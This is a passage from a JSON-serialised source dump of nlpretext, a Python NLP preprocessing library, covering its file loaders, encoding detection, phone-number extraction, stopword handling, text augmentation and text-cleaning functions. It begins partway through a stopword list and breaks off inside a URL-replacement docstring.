\"unlikely\",\n        \"until\",\n        \"unto\",\n        \"up\",\n        \"upon\",\n        \"us\",\n        \"use\",\n        \"used\",\n        \"useful\",\n        \"uses\",\n        \"using\",\n        \"usually\",\n 
       \"uucp\",\n        \"v\",\n        \"value\",\n        \"various\",\n        \"very\",\n        \"via\",\n        \"viz\",\n        \"vs\",\n        \"w\",\n        \"want\",\n        \"wants\",\n        \"was\",\n        \"wasn't\",\n        \"way\",\n        \"we\",\n        \"we'd\",\n        \"we'll\",\n        \"we're\",\n        \"we've\",\n        \"welcome\",\n        \"well\",\n        \"went\",\n        \"were\",\n        \"weren't\",\n        \"what\",\n        \"what's\",\n        \"whatever\",\n        \"when\",\n        \"whence\",\n        \"whenever\",\n        \"where\",\n        \"where's\",\n        \"whereafter\",\n        \"whereas\",\n        \"whereby\",\n        \"wherein\",\n        \"whereupon\",\n        \"wherever\",\n        \"whether\",\n        \"which\",\n        \"while\",\n        \"whither\",\n        \"who\",\n        \"who's\",\n        \"whoever\",\n        \"whole\",\n        \"whom\",\n        \"whose\",\n        \"why\",\n        \"will\",\n        \"willing\",\n        \"wish\",\n        \"with\",\n        \"within\",\n        \"without\",\n        \"won't\",\n        \"wonder\",\n        \"would\",\n        \"wouldn't\",\n        \"x\",\n        \"y\",\n        \"yes\",\n        \"yet\",\n        \"you\",\n        \"you'd\",\n        \"you'll\",\n        \"you're\",\n        \"you've\",\n        \"your\",\n        \"yours\",\n        \"yourself\",\n        \"yourselves\",\n        \"z\",\n        \"zero\",\n    ],\n}\n"
  },
  {
    "path": "nlpretext/_utils/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/_utils/daskloader.py",
    "content": "# mypy: disable-error-code=\"attr-defined\"\nfrom typing import List, Union\n\nimport dask.bag as db\nimport dask.dataframe as dd\n\n\ndef read_text(files_path: Union[str, List[str]], encoding: str):  # type: ignore\n    return db.read_text(files_path, encoding=encoding).str.strip().to_dataframe()\n\n\ndef read_json(files_path: Union[str, List[str]], encoding: str):  # type: ignore\n    return dd.read_json(files_path, encoding=encoding)\n\n\ndef read_csv(files_path: Union[str, List[str]], encoding: str):  # type: ignore\n    return dd.read_csv(files_path, encoding=encoding)\n\n\ndef read_parquet(files_path: Union[str, List[str]], encoding: str):  # type: ignore\n    return dd.read_parquet(files_path, encoding=encoding)\n"
  },
  {
    "path": "nlpretext/_utils/file_loader.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n# mypy: disable-error-code=\"assignment\"\n\nfrom typing import List, Union\n\nimport chardet\nfrom nlpretext._config import constants\n\n\ndef detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> str:\n    \"\"\"\n    Predict a file's encoding using chardet.\n\n    Parameters\n    ----------\n    file_path_or_string : string\n        if filepath, will open the file. 
Otherwise will predict from the string\n    n_lines : int\n        number of line to predict from\n\n    Returns\n    -------\n    string\n        the code of the detected encoding\n    \"\"\"\n    if isinstance(file_path_or_string, bytes):\n        rawdata = file_path_or_string\n    else:\n        with open(file_path_or_string, \"rb\") as f:\n            rawdata = b\"\".join([f.readline() for _ in range(n_lines)])\n    chardet_value: str = chardet.detect(rawdata)\n    return chardet_value\n\n\ndef check_text_file_format(filepath: Union[str, List[str]]) -> str:\n    \"\"\"\n    Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt.\n\n    Parameters\n    ----------\n    filepath : str | list(str)\n        A filepath with wildcard (eg. *.txt), or a list of filepaths.\n\n    Returns\n    -------\n    str\n        Format of the specified file path, among .json, .csv, .parquet or .txt\n    \"\"\"\n    pattern = constants.TEXT_FILE_FORMATS_PATTERN\n    if not isinstance(filepath, (list, tuple)):\n        filepath = [filepath]\n    format_re_list = [pattern.match(path) for path in filepath]\n    format_list = [format_re.group(1) for format_re in format_re_list if format_re]\n    if len(set(format_list)) > 1:\n        raise ValueError(f\"Multiple file formats found in file path list: {format_list}\")\n    if None in format_re_list:\n        raise ValueError(\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\"  # noqa: E501\n        )\n    file_format = format_list[0]\n    return file_format\n"
  },
  {
    "path": "nlpretext/_utils/pandasloader.py",
    "content": "from typing import List, Union\n\nimport pandas as pd\nfrom fsspec import open_files\n\n\ndef _list_handler(func):\n    def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame:  # type: ignore\n        list_files = open_files(file_path)\n        list_df = [func(file.path, *args, **kwargs) for file in list_files]\n        df = pd.concat(list_df)\n        return df\n\n    return wrapper_list_handler\n\n\n@_list_handler\ndef read_text(file_path: str, encoding: str) -> pd.DataFrame:\n    df = pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)])\n    return df\n\n\n@_list_handler\ndef read_json(file_path: str, encoding: str) -> pd.DataFrame:\n    df = pd.read_json(file_path, encoding=encoding)\n    return df\n\n\n@_list_handler\ndef read_csv(file_path: str, encoding: str) -> pd.DataFrame:\n    df = pd.read_csv(file_path, encoding=encoding)\n    return df\n\n\n@_list_handler\ndef read_parquet(file_path: str, encoding: str) -> pd.DataFrame:\n    df = pd.read_parquet(file_path, encoding=encoding)\n    return df\n"
  },
  {
    "path": "nlpretext/_utils/phone_number.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\nfrom typing import List, Optional\n\nimport phonenumbers as _phonenumbers\nfrom nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY\n\n\ndef find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]:\n    \"\"\"\n    Python port of Google's libphonenumber.\n    https://github.com/daviddrysdale/python-phonenumbers.\n\n    Parameters\n    ----------\n    region_code : str, optional\n        If specified, will find the number of the specified country.\n    eg. 06.00.00.00.00 if \"FR\" is specified.\n\n    If not specified, only works for international-formatted phone numbers.\n    - ie. phone number with +country code specified\n    eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.\n    supported value: look SUPPORTED_COUNTRY variable.\n\n    Returns\n    -------\n    list\n        list of matched phone numbers.\n\n    Raises\n    ------\n    ValueError\n        if country code is not supported.\n    \"\"\"\n    if region_code not in SUPPORTED_COUNTRY:\n        raise ValueError(\"Please enter a valid contry code. 
See SUPPORTED_COUNTRY list.\")\n    return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)]\n\n\ndef extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]:\n    \"\"\"\n    Find phone numbers in a text, returns a list of phone numbers.\n\n    Parameters\n    ----------\n    text : str\n    countrylist : list (eg. [None,'FR','US','GB'])\n        Look for phone numbers formatted according to the specified countrylist.\n        supported value: look SUPPORTED_COUNTRY variable.\n\n    Returns\n    -------\n    list\n        List of unique phone numbers found.\n    \"\"\"\n    all_phone_numbers: List[str] = []\n    for country in countrylist:\n        new_numbers_founds = find_phone_numbers(text, region_code=country)\n        all_phone_numbers.extend(new_numbers_founds)\n    return list(set(all_phone_numbers))\n\n\nclass PhoneParser:\n    \"\"\"\n    Python port of Google's libphonenumber.\n    https://github.com/daviddrysdale/python-phonenumbers.\n    \"\"\"\n\n    def __init__(self):\n        self.region_code = None\n        self.text = None\n        self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None\n\n    @property\n    def parsed_num(self) -> Optional[_phonenumbers.PhoneNumber]:\n        return self.__parsed_num\n\n    @parsed_num.setter\n    def parsed_num(self, value: Optional[_phonenumbers.PhoneNumber]) -> None:\n        self.__parsed_num = value\n\n    def parse_number(\n        self, text: str, region_code: Optional[str] = None\n    ) -> Optional[_phonenumbers.PhoneNumber]:\n        \"\"\"\n        Extract phone number from text.\n\n        Parameters\n        ----------\n        text: str\n        region_code : str, optional\n            If specified, will find the number of the specified country.\n        eg. 06.00.00.00.00 if \"FR\" is specified.\n        If not specified, only works for international-formatted phone numbers.\n        - ie. 
phone number with +country code specified\n        eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.\n        supported value: look SUPPORTED_COUNTRY variable.\n\n        Returns\n        -------\n        str\n            The parsed number\n\n        Raises\n        ------\n        NumberParseException\n            If the string doesn't contain a phone number or if the parser fails.\n        \"\"\"\n        self.region_code = region_code\n        self.text = text\n        self.parsed_num: Optional[_phonenumbers.PhoneNumber] = _phonenumbers.parse(\n            self.text, self.region_code\n        )\n        return self.parsed_num\n\n    def format_number(self, num_format: str) -> str:\n        \"\"\"\n        Convert a phone number to another standard format.\n\n        Parameters\n        ----------\n        num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'}\n\n        Returns\n        -------\n        str\n            Number formatted\n        \"\"\"\n        standard_format = FORMAT_NUMBERS.get(num_format)\n        if standard_format is None:\n            raise ValueError(f\"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}\")\n        if self.parsed_num is None:\n            raise ValueError(f\"Could not parse phone number {self.parsed_num}\")\n        formatted_number: Optional[str] = _phonenumbers.format_number(\n            self.parsed_num, standard_format\n        )\n        if formatted_number is None:\n            raise ValueError(f\"Could not format phone number {formatted_number}\")\n        return formatted_number\n"
  },
  {
    "path": "nlpretext/_utils/stopwords.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\n\nfrom typing import List\n\nfrom nlpretext._config.stopwords import STOPWORDS\nfrom stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING\nfrom stop_words import get_stop_words as _get_stop_words\n\n\ndef get_stopwords(lang: str = \"en\") -> List[str]:\n    \"\"\"Input a language code, returns a list of stopwords for the specified language.\n\n    Parameters\n    ----------\n    lang : str\n        Supported languages: ['ar', 'bg', 'ca', 'cz', 'da', 'nl', 'en',\n         'fi', 'fr', 'de', 'hi', 'hu', 'id', 'it', 'nb', 'pl', 'pt', 'ro', 'ru',\n         'sk', 'es', 'sv', 'tr', 'uk', 'vi', 'af', 'ha', 'so', 'st', 'sw', 'yo',\n         'zu', 'da', 'de', 'es', 'et', 'fi', 'fr', 'hr', 'hu', 'it', 'ko', 'nl',\n          'no', 'pl', 'pt', 'ru', 'sv', 'tr', 'zh', 'eo', 'he', 'la', 'sk', 'sl',\n          'br', 'ca', 'cs', 'el', 'eu', 'ga', 'gl', 'hy', 'id', 'ja', 'lv', 'th',\n           'ar', 'bg', 'bn', 'fa', 'hi', 'mr', 'ro', 'en']\n\n    Returns\n    -------\n    list\n        list of stopwords for a given language\n\n    Raises\n    ------\n    ValueError\n        When language is not available yet or incorrect country code\n    \"\"\"\n    if isinstance(lang, str) and len(lang) == 2:\n        lang = lang.lower()\n        custom_stopwords = STOPWORDS\n        stopwords = []\n\n        supported_lang_lib = 
list(_LANGUAGE_MAPPING.keys())\n        supported_lang_custom = list(custom_stopwords.keys())\n        supported_lang = supported_lang_lib + supported_lang_custom\n        if lang in supported_lang:\n            if lang in supported_lang_lib:\n                stopwords += _get_stop_words(lang)\n            if lang in supported_lang_custom:\n                stopwords += custom_stopwords[lang]\n        else:\n            raise ValueError(\n                \"Language not available yet or incorrect country code.\"\n                f\" Supported languages: {supported_lang}\"\n            )\n    else:\n        raise ValueError('Please input a valid country code, in 2 letters. Eg. \"us\" for USA. ')\n    return list(set(stopwords))\n"
  },
  {
    "path": "nlpretext/augmentation/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/augmentation/text_augmentation.py",
    "content": "from typing import Any, Dict, List, Optional, Tuple\n\nimport logging\nimport re\nfrom itertools import combinations\n\nimport nlpaug.augmenter.word as naw\n\n\nclass CouldNotAugment(ValueError):  # noqa: D101\n    pass\n\n\nclass UnavailableAugmenter(ValueError):  # noqa: D101\n    pass\n\n\ndef augment_text(\n    text: str,\n    method: str,\n    stopwords: Optional[List[str]] = None,\n    entities: Optional[List[Dict[str, Any]]] = None,\n) -> Tuple[str, List[Dict[str, Any]]]:\n    \"\"\"\n    Given a text with or without associated entities, generate a new text by\n    modifying some words in the initial one, modifications depend on the chosen\n    method (substitution with synonym, addition, deletion). If entities are\n    given as input, they will remain unchanged. If you want some words other\n    than entities to remain unchanged, specify it within the stopwords argument.\n\n    Parameters\n    ----------\n    text : string\n    method : {'wordnet_synonym', 'aug_sub_bert'}\n        augmenter to use ('wordnet_synonym' or 'aug_sub_bert')\n    stopwords : list, optional\n        list of words to freeze throughout the augmentation\n    entities : list, optional\n        entities associated to text if any, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n\n    Returns\n    -------\n    Augmented text and optional augmented entities\n    \"\"\"\n    augmenter = get_augmenter(method, stopwords)\n    augmented_text = augmenter.augment(text)\n    if entities is not None:\n        return process_entities_and_text(entities, text, augmented_text)\n    return augmented_text, []\n\n\ndef process_entities_and_text(\n    entities: List[Dict[str, Any]], text: str, augmented_text: str\n) -> Tuple[str, List[Dict[str, Any]]]:\n    
\"\"\"\n    Given a list of initial entities, verify that they have not been altered by\n    the data augmentation operation and are still in the augmented text.\n\n    Parameters\n    ----------\n    entities: list\n        entities associated to text, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n    text: str\n        initial text\n    augmented_text: str\n        new text resulting of data augmentation operation\n\n    Returns\n    -------\n    Augmented text and entities with their updated position in augmented text\n    \"\"\"\n    formatted_entities = [\n        (\n            text[entities[i][\"startCharIndex\"] : entities[i][\"endCharIndex\"]].strip(),\n            entities[i][\"entity\"],\n        )\n        for i in range(len(entities))\n    ]\n    if are_entities_in_augmented_text(entities, augmented_text):\n        augmented_entities = get_augmented_entities(augmented_text, formatted_entities)\n        clean_entities = clean_sentence_entities(augmented_text, augmented_entities)\n        return augmented_text, clean_entities\n    raise CouldNotAugment(\"Text was not correctly augmented because entities were altered\")\n\n\ndef are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool:\n    \"\"\"\n    Given a list of entities, check if all the words associated to each entity\n    are still present in augmented text.\n\n    Parameters\n    ----------\n    entities : list\n        entities associated to initial text, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n    
augmented_text : str\n\n    Returns\n    -------\n    True if all entities are present in augmented text, False otherwise\n    \"\"\"\n    check = True\n    for ent in entities:\n        if ent[\"word\"] not in augmented_text:\n            check = False\n            return check\n    return check\n\n\ndef get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> naw.SynonymAug:\n    \"\"\"\n    Initialize an augmenter depending on the given method.\n\n    Parameters\n    ----------\n    method : str (supported methods: wordnet_synonym and aug_sub_bert)\n    stopwords : list\n        list of words to freeze throughout the augmentation\n\n    Returns\n    -------\n    Initialized nlpaug augmenter\n    \"\"\"\n    if method == \"wordnet_synonym\":\n        return naw.SynonymAug(aug_src=\"wordnet\", stopwords=stopwords)\n    if method == \"aug_sub_bert\":\n        return naw.ContextualWordEmbsAug(\n            model_path=\"bert-base-uncased\", action=\"substitute\", stopwords=stopwords\n        )\n    raise UnavailableAugmenter(\n        \"The given augmenter is not supported. 
You must choose one \\\n        of the following: wordnet_synonym or aug_sub_bert\"\n    )\n\n\ndef get_augmented_entities(\n    sentence_augmented: str, entities: List[Tuple[str, Any]]\n) -> List[Dict[str, Any]]:\n    \"\"\"\n    Get entities with updated positions (start and end) in augmented text.\n\n    Parameters\n    ----------\n    sentence_augmented : str\n        augmented text\n    entities : list\n        entities associated to initial text, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n        ]\n\n    Returns\n    -------\n    Entities with updated positions related to augmented text\n    \"\"\"\n    entities_augmented = []\n    for entity in entities:\n        search = re.search(entity[0].strip(), sentence_augmented)\n        if search:\n            start_index = search.start()\n            end_index = search.end()\n            new_entity = {\n                \"entity\": entity[1],\n                \"word\": sentence_augmented[start_index:end_index],\n                \"startCharIndex\": start_index,\n                \"endCharIndex\": end_index,\n            }\n            entities_augmented.append(new_entity)\n    return entities_augmented\n\n\ndef clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]:\n    \"\"\"\n    Paired entities check to remove nested entities, the longest entity is kept.\n\n    Parameters\n    ----------\n    text : str\n        augmented text\n    entities : list\n        entities associated to augmented text, must be in the following format:\n        [\n            {\n                'entity': str,\n                'word': str,\n                'startCharIndex': int,\n                'endCharIndex': int\n            },\n            {\n                ...\n            }\n    
    ]\n\n    Returns\n    -------\n    Cleaned entities\n    \"\"\"\n    entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}]\n    for element1, element2 in combinations(entities_to_clean, 2):\n        result = check_interval_included(element1, element2)\n        if result is not None:\n            try:\n                entities_to_clean.remove(result[0])\n            except IndexError:\n                logging.warning(\n                    \"Cant remove entity : {} \\n entities are now :{} \\n for sentence : {} \".format(\n                        result, entities_to_clean, text\n                    )\n                )\n                continue\n    return entities_to_clean\n\n\ndef check_interval_included(\n    element1: Dict[str, Any], element2: Dict[str, Any]\n) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]:\n    \"\"\"\n    Comparison of two entities on start and end positions to find if they are nested.\n\n    Parameters\n    ----------\n    element1 : dict\n    element2 : dict\n        both of them in the following format\n        {\n            'entity': str,\n            'word': str,\n            'startCharIndex': int,\n            'endCharIndex': int\n        }\n\n    Returns\n    -------\n    If there is an entity to remove among the two returns a tuple\n    (element to remove, element to keep).\n    If not, returns None\n    \"\"\"\n    if (\n        (element1 != element2)\n        and (element1[\"startCharIndex\"] >= element2[\"startCharIndex\"])\n        and (element1[\"endCharIndex\"] <= element2[\"endCharIndex\"])\n    ):\n        return element1, element2\n    if (\n        (element1 != element2)\n        and (element2[\"startCharIndex\"] >= element1[\"startCharIndex\"])\n        and (element2[\"endCharIndex\"] <= element1[\"endCharIndex\"])\n    ):\n        return element2, element1\n    if (\n        (element1 != element2)\n        and (element1[\"startCharIndex\"] >= element2[\"startCharIndex\"])\n        and 
(element1[\"endCharIndex\"] >= element2[\"endCharIndex\"])\n        and (element1[\"startCharIndex\"] <= element2[\"endCharIndex\"] - 1)\n    ):\n        return element1, element2\n    if (\n        (element1 != element2)\n        and (element2[\"startCharIndex\"] >= element1[\"startCharIndex\"])\n        and (element2[\"endCharIndex\"] >= element1[\"endCharIndex\"])\n        and (element2[\"startCharIndex\"] < element1[\"endCharIndex\"] - 1)\n    ):\n        return element2, element1\n    return None\n"
  },
  {
    "path": "nlpretext/basic/__init__.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n"
  },
  {
    "path": "nlpretext/basic/preprocess.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\n\nfrom typing import List, Optional\n\nimport re\nimport unicodedata\n\nfrom flashtext import KeywordProcessor\nfrom ftfy import fix_text as _fix_text\nfrom nlpretext._config import constants\nfrom nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers\nfrom nlpretext._utils.stopwords import get_stopwords\nfrom nlpretext.token.tokenizer import tokenize\n\n\ndef normalize_whitespace(text: str) -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Given ``text`` str, replace one or more spacings with a single space, and\n    one or more linebreaks with a single newline. Also strip leading/trailing\n    whitespace.\n    eg. \"   foo  bar  \" -> \"foo bar\"\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = constants.NONBREAKING_SPACE_REGEX.sub(\n        \" \", constants.LINEBREAK_REGEX.sub(r\"\\n\", text)\n    ).strip()\n    return text\n\n\ndef remove_whitespace(text: str) -> str:\n    \"\"\"\n    Given ``text`` str, remove one or more spacings and linebreaks.\n    Also strip leading/trailing whitespace.\n    eg. 
\"   foo  bar  \" -> \"foobar\".\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    return constants.NONBREAKING_SPACE_REGEX.sub(\n        \"\", constants.LINEBREAK_REGEX.sub(\"\", text)\n    ).strip()\n\n\ndef lower_text(text: str) -> str:\n    \"\"\"\n    Given ``text`` str, transform it into lowercase.\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    return text.lower()\n\n\ndef filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str:\n    \"\"\"\n    Given ``token`` str and a list of groups of words\n    that were concatenated into tokens, reverses the tokens\n    to their ungrouped state.\n\n    Parameters\n    ----------\n    token : string\n    ignored_stopwords : list of strings\n\n    Returns\n    -------\n    string\n    \"\"\"\n    if ignored_stopwords:\n        for group in ignored_stopwords:\n            if token == remove_whitespace(group):\n                token = group\n    return token\n\n\ndef ungroup_ignored_stopwords(\n    tokens: List[str], ignored_stopwords: Optional[List[str]] = None\n) -> List[str]:\n    \"\"\"\n    Given ``tokens`` list of str and a list of groups of words\n    that are concatenated in tokens, reverses the tokens to\n    their ungrouped state.\n\n    Parameters\n    ----------\n    tokens : list of strings\n    ignored_stopwords : list of strings\n\n    Returns\n    -------\n    list of strings\n    \"\"\"\n    return [filter_groups(token, ignored_stopwords) for token in tokens]\n\n\ndef remove_stopwords(\n    text: str,\n    lang: str,\n    custom_stopwords: Optional[List[str]] = None,\n    ignored_stopwords: Optional[List[str]] = None,\n) -> str:\n    \"\"\"\n    Given ``text`` str, remove classic stopwords for a given language and\n    custom stopwords given as a list. 
Words and groups of words from\n    ignored_stopwords list are ignored during stopwords removal.\n\n    Parameters\n    ----------\n    text : string\n    lang : string\n    custom_stopwords : list of strings\n    ignored_stopwords : list of strings\n\n    Returns\n    -------\n    string\n\n    Raises\n    ------\n    ValueError\n        if ``custom_stopwords``  and ``ignored_stopwords`` have common elements.\n    \"\"\"\n    if custom_stopwords and ignored_stopwords:\n        common_elements = set(custom_stopwords).intersection(set(ignored_stopwords))\n        if common_elements != set():\n            raise ValueError(\n                f\"Found common words in custom_stopwords and ignored_stopwords: \\\n                {common_elements}. Please remove duplicated values.\"\n            )\n    stopwords = get_stopwords(lang)\n    if ignored_stopwords:\n        keyword_processor = KeywordProcessor()\n        singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1]\n        for group_of_words in ignored_stopwords:\n            keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words))\n        text = keyword_processor.replace_keywords(text)\n    else:\n        singletons_to_keep = []\n    if custom_stopwords:\n        stopwords += custom_stopwords\n    if not text:\n        raise ValueError(\"Found empty text. 
Please fix it before using this function.\")\n    if lang in [\"fr\", \"en\"]:\n        lang_module = {\"fr\": \"fr_spacy\", \"en\": \"en_spacy\"}[lang]\n        tokens = tokenize(text, lang_module)\n    else:\n        tokens = text.split()\n    tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)]\n    tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords)\n    return \" \".join(tokens)\n\n\ndef remove_eol_characters(text: str) -> str:\n    r\"\"\"\n    Remove end of line (\\n) char.\n\n    Parameters\n    ----------\n    text : str\n\n    Returns\n    -------\n    str\n    \"\"\"\n    text = text.replace(\"\\n\", \" \")\n    return text\n\n\ndef fix_bad_unicode(text: str, normalization: str = \"NFC\") -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Fix unicode text that's \"broken\" using `ftfy\n    <http://ftfy.readthedocs.org/>`_;\n    this includes mojibake, HTML entities and other code cruft,\n    and non-standard forms for display purposes.\n\n    Parameters\n    ----------\n    text : string\n\n    normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}):\n        if 'NFC', combines characters and diacritics written using separate\n        code points, e.g. converting \"e\" plus an acute accent modifier into\n        \"é\"; unicode\n        can be converted to NFC form without any change in its meaning!\n        if 'NFKC', additional normalizations are applied that can change\n        the meanings of characters, e.g. 
ellipsis characters will be replaced\n        with three periods\n\n    Returns\n    -------\n    string\n    \"\"\"\n    text = _fix_text(text, normalization=normalization)\n    return text\n\n\ndef unpack_english_contractions(text: str) -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace *English* contractions in ``text`` str with their unshortened\n    forms.\n    N.B. The \"'d\" and \"'s\" forms are ambiguous (had/would, is/has/possessive),\n    so are left as-is.\n    eg. \"You're fired. She's nice.\" -> \"You are fired. She's nice.\"\n\n    Parameters\n    ----------\n    text : string\n\n    Returns\n    -------\n    string\n    \"\"\"\n    # standard\n    text = constants.CONTRACTION_NT_NOT.sub(\n        r\"\\1\\2 not\",\n        text,\n    )\n    text = constants.CONTRACTION_LL_WILL.sub(\n        r\"\\1\\2 will\",\n        text,\n    )\n    text = constants.CONTRACTION_RE_ARE.sub(r\"\\1\\2 are\", text)\n    text = constants.CONTRACTION_VE_HAVE.sub(\n        r\"\\1\\2 have\",\n        text,\n    )\n    text = constants.CONTRACTION_CANT_CANNOT.sub(r\"\\1\\2n not\", text)\n    text = constants.CONTRACTION_M_AM.sub(r\"\\1\\2 am\", text)\n    text = constants.CONTRACTION_LET_LETUS.sub(r\"\\1\\2 us\", text)\n    text = constants.CONTRACTION_WONT_WILLNOT.sub(r\"\\1\\2ill not\", text)\n    text = constants.CONTRACTION_SHANT_SHALLNOT.sub(r\"\\1\\2hall not\", text)\n    text = constants.CONTRACTION_YALL_YOUALL.sub(r\"\\1\\2ou all\", text)\n    return text\n\n\ndef replace_urls(text: str, replace_with: str = \"*URL*\") -> str:\n    \"\"\"\n    ----\n    Copyright 2016 Chartbeat, Inc.\n    Code from textacy: https://github.com/chartbeat-labs/textacy\n    ----\n\n    Replace all URLs in ``text`` str with 